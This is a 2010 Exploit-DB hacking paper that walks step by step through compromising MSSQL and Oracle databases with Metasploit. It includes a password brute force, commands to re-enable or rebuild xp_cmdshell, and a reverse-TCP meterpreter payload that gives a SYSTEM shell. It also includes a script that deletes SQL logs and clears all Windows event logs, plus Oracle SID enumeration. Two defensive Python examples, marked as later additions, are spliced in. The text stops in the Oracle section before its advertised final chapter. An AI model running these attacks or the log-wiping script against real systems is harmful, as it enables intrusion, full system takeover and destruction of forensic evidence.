The Operation CloudBurst Attack

EDB-ID: 13621
CVE: N/A
Platform: Multiple
Date: 2010-02-18


		|=--------------------------------------------------------------------=|
		|=---------------=[ The Operation CloudBurst Attack ]=----------------=|
		|=--------------------------=[ 18 Feb 2010 ]=-------------------------=|
		|=----------------------=[  By CWH Underground  ]=--------------------=|
		|=--------------------------------------------------------------------=|
				

######
 Info
######

Title	: The Operation CloudBurst Attack
Author	: ZeQ3uL  (Prathan Phongthiproek)
Team    : CWH Underground [http://www.exploit-db.com/author/CWH Underground]
Website	: cwh.citec.us / www.citec.us
Date	: 2010-02-18


##########
 Contents
##########

  [0x00] - Introduction

  [0x01] - Get Root on MSSQL Database

	[0x01a] - Scanning & Enumeration
	[0x01b] - Gaining Access
	[0x01c] - Covering Track

  [0x02] - Get Root on Oracle Database
	
	[0x02a] - Scanning & Enumeration
	[0x02b] - Gaining Access
	[0x02c] - PL/SQL Injection - Elevate Priv

  [0x03] - Operation CloudBurst

  [0x04] - References

  [0x05] - Greetz To


#######################
 [0x00] - Introduction
#######################

	Hi all, in this paper we will guide you through methods of hacking into Microsoft SQL Server and Oracle Database, and through the latest attack in the chapter "Operation CloudBurst". Moreover,
we also show how to use the best exploitation tool, the Metasploit Framework (thanks to HD Moore and Rapid7), which is far more powerful than in the past, with many exploit and auxiliary modules (we will see it ;D).

	We divide the paper into 6 sections, from 0x00 to 0x05. However, only sections 0x01 to 0x03 are technical. In section 0x01 we show the steps to hack into an MSSQL database. In section 0x02 we switch to Oracle Database. The last technical section walks you step by step through the latest exploitation method, using the Metasploit Framework to get access to a system and compromise the whole domain network :-D

	We recommend reading our previous paper "The Art of Grey-Box Attack", which guides you through methods of hacking into Windows systems, Linux systems and client-side attacks.


#####################################
 [0x01] - Get Root on MSSQL Database
#####################################
	
		In this section we talk about attacking MSSQL databases on the network. We start with scanning
	and enumerating MSSQL, then move on to gaining access to the system with SYSTEM privileges in order to control the machine completely.


	++++++++++++++++++++++++++++++++++
	 [0x01a] - Scanning & Enumeration
	++++++++++++++++++++++++++++++++++
	
		First, start with scanning using the Metasploit Framework's MSSQL modules.

	Auxiliary
	=========

	   Name                       Rank    Description
	   ----                       ----    -----------
	   admin/mssql/mssql_enum     normal  Microsoft SQL Server Configuration Enumerator
	   admin/mssql/mssql_exec     normal  Microsoft SQL Server xp_cmdshell Command Execution
	   admin/mssql/mssql_sql      normal  Microsoft SQL Server Generic Query
	   scanner/mssql/mssql_login  normal  MSSQL Login Utility
	   scanner/mssql/mssql_ping   normal  MSSQL Ping Utility

	
	Exploits
	========

	   Name                                         Rank       Description
	   ----                                         ----       -----------
	   windows/mssql/lyris_listmanager_weak_pass    excellent  Lyris ListManager MSDE Weak sa Password
	   windows/mssql/ms02_039_slammer               good       Microsoft SQL Server Resolution Overflow
	   windows/mssql/ms02_056_hello                 good       Microsoft SQL Server Hello Overflow
	   windows/mssql/ms09_004_sp_replwritetovarbin  good       Microsoft SQL Server sp_replwritetovarbin Memory Corruption
	   windows/mssql/mssql_payload                  excellent  Microsoft SQL Server Payload Execution


		In the first example we use mssql_login to scan for machines running an MSSQL database and try a dictionary attack with our wordlist:

	[MSF Result]-----------------------------------------------------------------------------------
	
	msf > use scanner/mssql/mssql_login
	msf auxiliary(mssql_login) > show options

	Module options:
	
	   Name             Current Setting                                Required  Description
	   ----             ---------------                                --------  -----------
	   HEX2BINARY       /opt/metasploit3/msf3/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
	   MSSQL_PASS                                                      no        The password for the specified username
	   MSSQL_PASS_FILE                                                 no        A dictionary of passwords to perform a bruteforce attempt
	   MSSQL_USER       sa                                             no        The username to authenticate as
	   RHOSTS                                                          yes       The target address range or CIDR identifier
	   RPORT            1433                                           yes       The target port
	   THREADS          1                                              yes       The number of concurrent threads

	msf auxiliary(mssql_login) > set RHOSTS 192.168.163.0/24
	RHOSTS => 192.168.163.0/24
	msf auxiliary(mssql_login) > set MSSQL_PASS_FILE /pentest/passwords/wordlists/sqlpass.lst
	MSSQL_PASS_FILE => /pentest/passwords/wordlists/sqlpass.lst
	msf auxiliary(mssql_login) > run
	
	[*] 192.168.163.128:1433 successful logged in as 'sa' with password ''
	[*] Scanned 1 of 3 hosts (100% complete)
	[*] Auxiliary module execution completed


	[End Result]------------------------------------------------------------------------------------
	
		From the result, we logged in successfully as 'sa' with a blank password on 192.168.163.128 (many admins use 'password' or 'p@ssw0rd', without the quotes). Next, we use mssql_enum to enumerate MSSQL information from the target.
	
	[MSF Result]-----------------------------------------------------------------------------------
	
	msf > use admin/mssql/mssql_enum
	msf auxiliary(mssql_enum) > show options

	Module options:

	   Name        Current Setting                                Required  Description
	   ----        ---------------                                --------  -----------
	   HEX2BINARY  /opt/metasploit3/msf3/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
	   MSSQL_PASS                                                 no        The password for the specified username
	   MSSQL_USER  sa                                             no        The username to authenticate as
	   RHOST                                                      yes       The target address
	   RPORT       1433                                           yes       The target port

	msf auxiliary(mssql_enum) > set RHOST 192.168.163.128
	RHOST => 192.168.163.128
	msf auxiliary(mssql_enum) > run
	
	[*] Running MS SQL Server Enumeration...
	[*] Version:
	[*]     Microsoft SQL Server  2000 - 8.00.194 (Intel X86)
	[*]             Aug  6 2000 00:57:48
	[*]             Copyright (c) 1988-2000 Microsoft Corporation
	[*]             Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 1)
	[*] Configuration Parameters:
	[*]     C2 Audit Mode is Not Enabled
	[*]     xp_cmdshell is Enabled
	[*]     remote access is Enabled
	[*]     allow updates is Not Enabled
	[*]     Database Mail XPs is Enabled
	[*]     Ole Automation Procedures is Enabled
	[*] Databases on the server:
	[*]     Database name:master
	[*]     Database Files for master:
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\master.mdf
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\mastlog.ldf
	[*]     Database name:tempdb
	[*]     Database Files for tempdb:
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\tempdb.mdf
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\templog.ldf
	[*]     Database name:model
	[*]     Database Files for model:
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\model.mdf
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\modellog.ldf
	[*]     Database name:msdb
	[*]     Database Files for msdb:
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\msdbdata.mdf
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\msdblog.ldf
	[*]     Database name:pubs
	[*]     Database Files for pubs:
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\pubs.mdf
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\pubs_log.ldf
	[*]     Database name:Northwind
	[*]     Database Files for Northwind:
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\northwnd.mdf
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\northwnd.ldf
	[*] System Logins on this Server:
	[*]     sa
	[*]     BUILTIN\Administrators
	[*] System Admin Logins on this Server:
	[*]     BUILTIN\Administrators
	[*]     sa
	[*] Windows Logins on this Server:
	[*]     No Windows logins found!
	[*] Windows Groups that can logins on this Server:
	[*]     BUILTIN\Administrators
	[*] Accounts with Username and Password being the same:
	[*]     No Account with its password being the same as its username was found.
	[*] Accounts with empty password:
	[*]     sa
	[*] Stored Procedures with Public Execute Permission found:
	[*]     xp_getfiledetails
	[*]     xp_dirtree
	[*]     xp_fixeddrives
	[*]     xp_cmdshell
	[*]     xp_getnetname
	[*]     xp_enum_activescriptengines
	[*]     xp_fileexist
	[*]     xp_ntsec_enumdomains
	[*]     sp_getbindtoken
	[*]     sp_createorphan
	[*]     xp_unc_to_drive
	[*]     sp_droporphans
	[*]     xp_MSplatform
	[*]     sp_xml_preparedocument
	[*]     sp_xml_removedocument
	[*]     xp_IsNTAdmin
	[*]     xp_MSnt2000
	[*]     xp_grantlogin
	[*]     xp_revokelogin
	[*]     xp_MSLocalSystem
	[*]     sp_prepexec
	[*]     sp_prepexecrpc
	[*]     sp_unprepare
	[*]     sp_reset_connection
	[*]     sp_getschemalock
	[*]     sp_releaseschemalock
	[*]     sp_resyncprepare
	[*]     sp_resyncexecute
	[*]     sp_resyncexecutesql
	[*]     sp_resyncuniquetable
	[*]     sp_refreshview
	[*]     sp_repldone
	[*]     sp_repltrans
	[*]     sp_replcounters
	[*]     sp_replcmds
	[*]     sp_replpostschema
	[*]     sp_replincrementlsn
	[*]     sp_replsetoriginator
	[*]     sp_replsetsyncstatus
	[*]     xp_mergexpusage
	[*]     xp_showlineage
	[*]     xp_updatelineage
	[*]     xp_proxiedmetadata
	[*]     xp_initcolvs
	[*]     xp_updatecolvbm
	[*]     xp_showcolv
	[*]     xp_execresultset
	[*]     xp_varbintohexstr
	[*]     xp_intersectbitmaps
	[*]     xp_displayparamstmt
	[*]     xp_printstatements
	[*]     sp_replsendtoqueue
	[*]     sp_replwritetovarbin
	[*]     xp_qv
	[*]     xp_regread
	[*] Instances found on this server:
	[*]     MSSQLSERVER
	[*] Default Server Instance SQL Server Service is running under the privilege of:
	[*]     LocalSystem
	[*] Auxiliary module execution completed

	[End Result]------------------------------------------------------------------------------------
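	Read from the defender's side, the mssql_enum output above is a configuration audit. As an added example (not part of the original paper), the following Python parses output in that format and flags the findings that together make such a host trivial to take over: an empty 'sa' password, xp_cmdshell and Ole Automation enabled, PUBLIC execute on dangerous extended procedures, and a service account of LocalSystem. The sample is a constructed excerpt of the run above.

```python
import re

# Constructed excerpt of mssql_enum output, trimmed from the run above.
SAMPLE_ENUM = """\
[*] Running MS SQL Server Enumeration...
[*] Version:
[*]     Microsoft SQL Server  2000 - 8.00.194 (Intel X86)
[*] Configuration Parameters:
[*]     C2 Audit Mode is Not Enabled
[*]     xp_cmdshell is Enabled
[*]     remote access is Enabled
[*]     allow updates is Not Enabled
[*]     Ole Automation Procedures is Enabled
[*] Accounts with empty password:
[*]     sa
[*] Stored Procedures with Public Execute Permission found:
[*]     xp_dirtree
[*]     xp_cmdshell
[*]     xp_regread
[*]     sp_prepexec
[*] Instances found on this server:
[*]     MSSQLSERVER
[*] Default Server Instance SQL Server Service is running under the privilege of:
[*]     LocalSystem
[*] Auxiliary module execution completed
"""

# Extended procedures that PUBLIC should never be able to execute.
DANGEROUS_XPS = {"xp_cmdshell", "xp_regread", "xp_regwrite", "xp_dirtree",
                 "xp_fileexist", "xp_getfiledetails"}


def parse_enum(text):
    """Turn mssql_enum output into {section: [items]}. A '[*]' line ending in
    ':' opens a section; indented '[*]' lines below it are its items."""
    sections, current = {}, None
    for raw in text.splitlines():
        m = re.match(r"\[\*\]\s?(.*)$", raw)
        if not m:
            continue
        body = m.group(1)
        if body.startswith("    "):          # indented: item of the open section
            if current is not None:
                sections[current].append(body.strip())
        elif body.endswith(":"):              # section header
            current = body[:-1]
            sections.setdefault(current, [])
        else:                                 # status line, closes any section
            current = None
    return sections


def config_flags(sections):
    """'xp_cmdshell is Enabled' -> {'xp_cmdshell': True}; 'Not Enabled' -> False."""
    flags = {}
    for item in sections.get("Configuration Parameters", []):
        name, sep, state = item.rpartition(" is ")
        if sep:
            flags[name] = (state == "Enabled")
    return flags


def risky_findings(text):
    """List the weaknesses that, combined, let the paper go from a blank 'sa'
    password straight to a SYSTEM shell."""
    s = parse_enum(text)
    cfg = config_flags(s)
    findings = []
    if "sa" in s.get("Accounts with empty password", []):
        findings.append("sa login has an empty password")
    if cfg.get("xp_cmdshell"):
        findings.append("xp_cmdshell is enabled")
    if cfg.get("Ole Automation Procedures"):
        findings.append("Ole Automation Procedures enabled (sp_OACreate can recreate xp_cmdshell)")
    if not cfg.get("C2 Audit Mode", False):
        findings.append("C2 audit mode is not enabled")
    public = set(s.get("Stored Procedures with Public Execute Permission found", []))
    for xp in sorted(public & DANGEROUS_XPS):
        findings.append(f"PUBLIC can execute {xp}")
    account = s.get("Default Server Instance SQL Server Service is running under the privilege of", [])
    if any(a.lower() in ("localsystem", "nt authority\\system") for a in account):
        findings.append("service account is LocalSystem: xp_cmdshell commands run as SYSTEM")
    return findings


if __name__ == "__main__":
    for f in risky_findings(SAMPLE_ENUM):
        print("[!]", f)
```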
	


	++++++++++++++++++++++++++
	 [0x01b] - Gaining Access
	++++++++++++++++++++++++++


		Next, we will get a shell from the target with MSSQL's stored procedure xp_cmdshell. It is enabled by default on MSSQL 2000, but on MSSQL 2005 and 2008 it is disabled by default, so we can re-enable or re-create xp_cmdshell with these commands (Metasploit's 'admin/mssql/mssql_exec' can re-enable xp_cmdshell):

	Re-enable xp_cmdshell on MSSQL 2005/2008:

	    exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;
	    exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;

	Re-enable xp_cmdshell on MSSQL 2000:

	    exec sp_addextendedproc 'xp_cmdshell','xp_log70.dll';
	    exec sp_addextendedproc 'xp_cmdshell', 'C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\xplog70.dll';

	Rebuild xp_cmdshell if it was deleted:

	    CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
	    DECLARE @result int, @OLEResult int, @RunResult int;
	    DECLARE @ShellID int;
	    EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT;
	    IF @OLEResult <> 0 SELECT @result = @OLEResult;
	    IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult);
	    EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait;
	    IF @OLEResult <> 0 SELECT @result = @OLEResult;
	    IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult);
	    EXECUTE @OLEResult = sp_OADestroy @ShellID;
	    return @result;

		Now we use mssql_payload to spawn a meterpreter shell, which makes it easy to compromise the system.

	[MSF Result]-----------------------------------------------------------------------------------
	
	msf > use windows/mssql/mssql_payload
	msf exploit(mssql_payload) > show options

	Module options:

	   Name      Current Setting  Required  Description
	   ----      ---------------  --------  -----------
	   PASSWORD                   no        The password for the specified username
	   RHOST                      yes       The target address
	   RPORT     1433             yes       The target port
	   USERNAME  sa               no        The username to authenticate as

	
	Exploit target:

	   Id  Name
	   --  ----
	   0   Automatic

	
	msf exploit(mssql_payload) > set RHOST 192.168.163.128
	RHOST => 192.168.163.128
	msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
	PAYLOAD => windows/meterpreter/reverse_tcp
	msf exploit(mssql_payload) > set LHOST 192.168.163.2
	LHOST => 192.168.163.2
	msf exploit(mssql_payload) > exploit
	[*] Started reverse handler on port 4444
	[*] Warning: This module will leave nPIsxDgn.exe in the SQL Server %TEMP% directory
	[*] Writing the debug.com loader to the disk...
	
	[*] Converting the debug script to an executable...
	[*] Uploading the payload, please be patient...
	[*] Converting the encoded payload...
	[*] Executing the payload...
	[*] Sending stage (725504 bytes)
	[*] Meterpreter session 1 opened (192.168.163.2:4444 -> 192.168.163.128:1050)

	meterpreter > getuid
	Server username: NT AUTHORITY\SYSTEM
	
	[End Result]------------------------------------------------------------------------------------
	
		

	++++++++++++++++++++++++++
	 [0x01c] - Covering Track
	++++++++++++++++++++++++++
	

		What about log files? When we use a meterpreter script to spawn a shell, the Windows Event Viewer keeps a record of our activity. So I found a nice script from Zero Cold@intern0t to clear our logs:

	Mssqlclear.rb

	[Code]-----------------------------------------------------------------------------------

	#MSSQL LOG CLEAR BY ZERO COLD

	def list_exec(session,cmdlst)
	  print_status("Running Command List ...")
	  r=''
	  session.response_timeout=120
	  cmdlst.each do |cmd|
	    begin
	      print_status "running command #{cmd}"
	      r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
	      while(d = r.channel.read)
	        print_status("#{d}")
	      end
	      r.channel.close
	      r.close
	    rescue ::Exception => e
	      print_error("Error Running Command #{cmd}: #{e.class} #{e}")
	    end
	  end
	end

	commands = ['Net STOP "SQL Server (SQLEXPRESS)" ',
	  'del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\ERRORLOG.*"',
	  'del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\log*.trc"',
	  'Net START "SQL Server (SQLEXPRESS)"']

	def clrevtlgs(session)
	  evtlogs = [
	    'security',
	    'system',
	    'application',
	    'directory service',
	    'dns server',
	    'file replication service'
	  ]
	  print_status("Clearing Event Logs, this will leave and event 517")
	  begin
	    evtlogs.each do |evl|
	      print_status("Clearing the #{evl} Event Log")
	      log = session.sys.eventlog.open(evl)
	      log.clear
	    end
	    print_status("All Event Logs have been cleared")
	  rescue ::Exception => e
	    print_status("Error clearing Event Log: #{e.class} #{e}")
	  end
	end

	list_exec(client,commands)
	clrevtlgs(client)

	[End Code]------------------------------------------------------------------------------------


	Now that we have mssqlclear.rb, place the code in your Metasploit scripts directory.


	[Run Script]---------------------------------------------------------------------------------
		
	meterpreter > run mssqlclear
	[*] Running Command List ...
	[*] running command Net STOP "SQL Server (SQLEXPRESS)"
	[*] The SQL Server (SQLEXPRESS) service is stopping.
	[*] The SQL Server (SQLEXPRESS) service was stopped successfully.
	[*] running command del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\ERRORLOG.*"
	[*] running command del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\log*.trc"
	[*] running command Net START "SQL Server (SQLEXPRESS)"
	[*] The SQL Server (SQLEXPRESS) service is starting.
	[*] The SQL Server (SQLEXPRESS) service was started successfully.
	[*] Clearing Event Logs, this will leave and event 517
	[*] Clearing the security Event Log
	[*] Clearing the system Event Log
	[*] Clearing the application Event Log
	[*] Clearing the directory service Event Log
	[*] Clearing the dns server Event Log
	[*] Clearing the file replication service Event Log
	[*] All Event Logs have been cleared
	meterpreter >

	[End Run]------------------------------------------------------------------------------------
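	The script above stops the SQL service, deletes ERRORLOG from disk and clears every event log, so the only durable evidence is whatever was already forwarded off the host. As an added defender-side example (not from the paper), this Python correlates forwarded records for exactly that sequence: Service Control Manager event 7036 showing a SQL Server service stop and start, followed within minutes by a log-cleared event (517 on Windows 2000/2003, 1102 on later versions). The sample events are constructed; a service bounce on its own is treated as routine and does not alert.

```python
from datetime import datetime, timedelta

# Constructed sample of forwarded Windows events. SQL01 shows the trace the
# script above leaves: Service Control Manager event 7036 for the SQL service
# stopping and starting again, then the Security log being cleared (event 517
# on Windows 2000/2003; 1102 on Vista and later). SQL02 is a routine restart
# with no log clearing and must not alert.
SAMPLE_EVENTS = [
    {"time": "2010-02-18 10:00:01", "host": "SQL01", "id": 7036,
     "msg": "The SQL Server (SQLEXPRESS) service entered the stopped state."},
    {"time": "2010-02-18 10:00:09", "host": "SQL01", "id": 7036,
     "msg": "The SQL Server (SQLEXPRESS) service entered the running state."},
    {"time": "2010-02-18 10:00:12", "host": "SQL01", "id": 517,
     "msg": "The audit log was cleared."},
    {"time": "2010-02-18 03:00:00", "host": "SQL02", "id": 7036,
     "msg": "The SQL Server (MSSQLSERVER) service entered the stopped state."},
    {"time": "2010-02-18 03:05:00", "host": "SQL02", "id": 7036,
     "msg": "The SQL Server (MSSQLSERVER) service entered the running state."},
]

LOG_CLEARED_IDS = {517, 1102}
WINDOW = timedelta(minutes=10)   # how close stop, start and clear must be


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def sql_service_bounces(events):
    """Return [(host, service, stop_time, start_time)] for every SQL Server
    service that was stopped and started again within WINDOW."""
    bounces = []
    pending = {}   # (host, service) -> time of the stop event
    for e in sorted(events, key=lambda e: e["time"]):
        if e["id"] != 7036 or "SQL Server" not in e["msg"]:
            continue
        # "The SQL Server (X) service entered the ..." -> "SQL Server (X)"
        service = e["msg"].split(" service entered")[0].replace("The ", "", 1)
        key = (e["host"], service)
        if e["msg"].endswith("stopped state."):
            pending[key] = parse_time(e["time"])
        elif e["msg"].endswith("running state.") and key in pending:
            stop, start = pending.pop(key), parse_time(e["time"])
            if start - stop <= WINDOW:
                bounces.append((e["host"], service, stop, start))
    return bounces


def detect_log_tampering(events):
    """Alert when a SQL service bounce is followed within WINDOW by an
    event-log-cleared record on the same host: the sequence mssqlclear.rb
    produces. A bounce alone is normal maintenance and does not alert."""
    clears = [(e["host"], parse_time(e["time"]))
              for e in events if e["id"] in LOG_CLEARED_IDS]
    alerts = []
    for host, service, stop, start in sql_service_bounces(events):
        for chost, ctime in clears:
            if chost == host and start <= ctime <= start + WINDOW:
                alerts.append({"host": host, "service": service,
                               "stopped": stop, "started": start, "cleared": ctime})
    return alerts


if __name__ == "__main__":
    for a in detect_log_tampering(SAMPLE_EVENTS):
        print(f"possible log tampering on {a['host']}: {a['service']} bounced at "
              f"{a['stopped']:%H:%M:%S}, logs cleared at {a['cleared']:%H:%M:%S}")
```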
	


######################################
 [0x02] - Get Root on Oracle Database
######################################

	

	++++++++++++++++++++++++++++++++++
	 [0x02a] - Scanning & Enumeration
	++++++++++++++++++++++++++++++++++

		First, start with scanning using the Metasploit Framework's Oracle modules.

	Auxiliary
	=========

	   Name                                        Rank    Description
	   ----                                        ----    -----------
	   admin/oracle/droptable_trigger              normal  SQL Injection in  MDSYS.SDO_TOPO_DROP_FTBL Trigger.
	   admin/oracle/login_brute                    normal  Oracle Account Discovery.
	   admin/oracle/ora_ntlm_stealer               normal  Oracle SMB Relay Code Execution
	   admin/oracle/oracle_sql                     normal  Oracle SQL Generic Query
	   admin/oracle/oraenum                        normal  Oracle Database Enumeration
	   admin/oracle/osb_execqr                     normal  Oracle Secure Backup exec_qr() Command Injection Vulnerability
	   admin/oracle/osb_execqr2                    normal  Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability
	   admin/oracle/post_exploitation/win32exec    normal  Oracle Java execCommand (Win32)
	   admin/oracle/post_exploitation/win32upload  normal  Oracle URL Download
	   admin/oracle/sid_brute                      normal  ORACLE SID Brute Forcer.
	   admin/oracle/tnscmd                         normal  TNSLsnr Command Issuer
	   scanner/oracle/emc_sid                      normal  Oracle Enterprise Manager Control SID Discovery
	   scanner/oracle/sid_enum                     normal  SID Enumeration.
	   scanner/oracle/spy_sid                      normal  Oracle Application Server Spy Servlet SID Enumeration.
	   scanner/oracle/tnslsnr_version              normal  Oracle tnslsnr Service Version Query.
	   scanner/oracle/xdb_sid                      normal  Oracle XML DB SID Discovery
	   sqli/oracle/dbms_cdc_ipublish               normal  SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE
	   sqli/oracle/dbms_cdc_publish                normal  SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE
	   sqli/oracle/dbms_defer_sys                  normal  SQL Injection via SYS.DBMS_DEFER_SYS
	   sqli/oracle/dbms_export_extension           normal  SQL Injection via DBMS_EXPORT_EXTENSION
	   sqli/oracle/dbms_metadata_get_granted_xml   normal  SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML.
	   sqli/oracle/dbms_metadata_get_xml           normal  SQL Injection via SYS.DBMS_METADATA.GET_XML.
	   sqli/oracle/dbms_metadata_open              normal  SQL Injection via SYS.DBMS_METADATA.OPEN.
	   sqli/oracle/lt_compressworkspace            normal  SQL Injection via SYS.LT.COMPRESSWORKSPACE.
	   sqli/oracle/lt_findricset_cursor            normal  SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method
	   sqli/oracle/lt_mergeworkspace               normal  SQL Injection via SYS.LT.MERGEWORKSPACE.
	   sqli/oracle/lt_removeworkspace              normal  SQL Injection via SYS.LT.REMOVEWORKSPACE.
	   sqli/oracle/lt_rollbackworkspace            normal  SQL Injection via SYS.LT.ROLLBACKWORKSPACE.


	Exploits
	========

	   Name                                       Rank    Description
	   ----                                       ----    -----------
	   windows/browser/oracle_dc_submittoexpress  normal  Oracle Document Capture 10g ActiveX Control Buffer Overflow
	   windows/ftp/oracle9i_xdb_ftp_pass          great   Oracle 9i XDB FTP PASS Overflow (win32)
	   windows/ftp/oracle9i_xdb_ftp_unlock        great   Oracle 9i XDB FTP UNLOCK Overflow (win32)
	   windows/http/oracle9i_xdb_pass             great   Oracle 9i XDB HTTP PASS Overflow (win32)
	   windows/oracle/osb_ndmp_auth               good    Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow
	   windows/oracle/tns_arguments               good    Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow.
	   windows/oracle/tns_service_name            good    Oracle TNS Listener SERVICE_NAME Buffer Overflow.



		Next, we must find machines that run Oracle DB (default port 1521) with 'scanner/oracle/tnslsnr_version'.

	[MSF Result]----------------------------------------------------------------------------

	msf > use scanner/oracle/tnslsnr_version
	msf auxiliary(tnslsnr_version) > show options

	Module options:

	   Name     Current Setting  Required  Description
	   ----     ---------------  --------  -----------
	   RHOSTS                    yes       The target address range or CIDR identifier
	   RPORT    1521             yes       The target port
	   THREADS  1                yes       The number of concurrent threads
	
	msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.163.0/24
	RHOSTS => 192.168.163.0/24
	msf auxiliary(tnslsnr_version) > run
	
	[*] Scanned 026 of 256 hosts (010% complete)
	[*] Scanned 052 of 256 hosts (020% complete)
	[*] Scanned 077 of 256 hosts (030% complete)
	[*] Scanned 103 of 256 hosts (040% complete)
	[*] Scanned 128 of 256 hosts (050% complete)
	[*] Host 192.168.163.140 is running: 32-bit Windows: Version 9.2.0.1.0 - Production
	[*] Scanned 154 of 256 hosts (060% complete)
	[*] Scanned 180 of 256 hosts (070% complete)
	[*] Scanned 205 of 256 hosts (080% complete)
	[*] Scanned 231 of 256 hosts (090% complete)
	[*] Scanned 256 of 256 hosts (100% complete)
	[*] Auxiliary module execution completed

	[End Result]----------------------------------------------------------------------------

		Next step: find the SID (service name) of the instance on 192.168.163.140. On Oracle 9i the SID can be enumerated from the TNS listener (no password required), or use tnscmd to query the listener's services to find the SID.

	
	[MSF Result]----------------------------------------------------------------------------

	msf auxiliary(tnslsnr_version) > use scanner/oracle/sid_enum
	msf auxiliary(sid_enum) > show options
	
	Module options:

	   Name     Current Setting  Required  Description
	   ----     ---------------  --------  -----------
	   RHOSTS                    yes       The target address range or CIDR identifier
	   RPORT    1521             yes       The target port
	   THREADS  1                yes       The number of concurrent threads

	msf auxiliary(sid_enum) > set RHOSTS 192.168.163.140
	RHOSTS => 192.168.163.140
	msf auxiliary(sid_enum) > run
	
	[*] Identified SID for 192.168.163.140: RD
	[*] Identified SERVICE_NAME for 192.168.163.140: RD.ORA
	[*] Scanned 1 of 1 hosts (100% complete)
	[*] Auxiliary module execution completed
	msf auxiliary(sid_enum) >

	[End Result]----------------------------------------------------------------------------

		It seems we were lucky to find SERVICE_NAME=RD.ORA. If 'sid_enum' does not work, you can use 'admin/oracle/sid_brute' to find the SID. Next, make sure that SERVICE_NAME=RD.ORA really exists with
	'admin/oracle/tnscmd':
	
	[MSF Result]----------------------------------------------------------------------------

	msf auxiliary(sid_enum) > use admin/oracle/tnscmd
	msf auxiliary(tnscmd) > show options

	Module options:

	   Name   Current Setting                   Required  Description
	   ----   ---------------                   --------  -----------
	   CMD    (CONNECT_DATA=(COMMAND=VERSION))  no        Something like ping, version, status, etc..
	   RHOST                                    yes       The target address
	   RPORT  1521                              yes       The target port
	
	msf auxiliary(tnscmd) > set RHOST 192.168.163.140
	RHOST => 192.168.163.140
	msf auxiliary(tnscmd) > set CMD (CONNECT_DATA=(COMMAND=STATUS))
	CMD => (CONNECT_DATA=(COMMAND=STATUS))
	msf auxiliary(tnscmd) > run
	sending (CONNECT_DATA=(COMMAND=status)) to 192.168.163.140:1521
	writing 89 bytes
	reading
	. .......6.........S. ...........]........(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0)(ALIAS=LISTENER)
	(SECURITY=OFF)(VERSION=TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production)(START_DATE=13-11TB-200809:50:24)(SIDNUM=1)(LOGFILE=e:\oracle\ora92\network\log\listener.log)
	(PRMFILE=e:\oracle\ora92\network\admin\listener.ora)(TRACING=off)(UPTIME=32233167)(SNMP=OFF)(PID=1580))
	.5........(ENDPOINT=(HANDLER=(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLISHED=0)(REFUSED=0)
	(HANDLER_ID=05ABD43D6CF4-438B-A1A1-14FC7801D431)(PRE=any)(SESSION=NS)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)
	(HOST=abc.com)(PORT=1521))))),,(ENDPOINT=(HANDLER=(STA=ready)(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)
	(ESTABLISHED=0)(REFUSED=0)(HANDLER_ID=A06894A90C64-4555-A915-FC8798AA2A9B)(PRE=http)(SESSION=RAW)
	(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=abc.com)(PORT=8080))(Presentation=HTTP)(Session=RAW)))),,
	(ENDPOINT=(HANDLER=(STA=ready)(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLISHED=0)(REFUSED=0)
	(HANDLER_ID=A0BB13DB2389-431A-80F2-D896C275A179)(PRE=FTP)(SESSION=RAW)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)
	(HOST=abc.com)(PORT=2100))(Presentation=FTP)(Session=RAW)))),,(SERVICE=(SERVICE_NAME=RD.ORA)
	(INSTANCE=(INSTANCE_NAME=RD)(NUM=2)(NUMREL=1))),,(SERVICE=(SERVICE_NAME=RD.ORA)
	(INSTANCE=(INSTANCE_NAME=RD)(NUM=2)(NUMREL=1))),,.........@

